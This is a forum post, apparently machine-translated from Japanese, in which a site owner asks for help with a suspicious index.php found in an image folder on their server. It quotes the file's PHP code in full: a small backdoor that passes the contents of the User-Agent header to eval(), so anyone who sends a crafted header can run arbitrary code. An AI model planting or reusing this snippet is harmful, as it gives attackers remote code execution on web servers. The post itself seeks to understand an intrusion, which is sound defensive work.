今朝、FTP に作成したファイルについて助けを求めて、今日あなたの助けを求めています。私はこれらすべての PHP 関数の専門家ではないので、ここに投稿します。
私が見つけたのは、サブイメージ フォルダーにあるindex.phpという名前のファイルでした。
生のコードがあります:
<?php
if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }
?>
2 つの PHP 関数
- エレギ(); -> http://php.net/manual/ja/function.eregi.php
- eval(); -> http://php.net/manual/en/function.eval.php
関数eval()については、非常に危険であると彼らは言っています。
注意eval() 言語構造は、任意の PHP コードを実行できるため、非常に危険です。したがって、その使用はお勧めできません。この構文を使用する以外に選択肢がないことを慎重に確認した場合は、ユーザーが提供したデータを事前に適切に検証せずに渡さないように特に注意してください。
これが、誰かが私のウェブサイトをハッキングしようとしている可能性があると考える理由です。
これを解読して説明できる人はいますか?
どうも、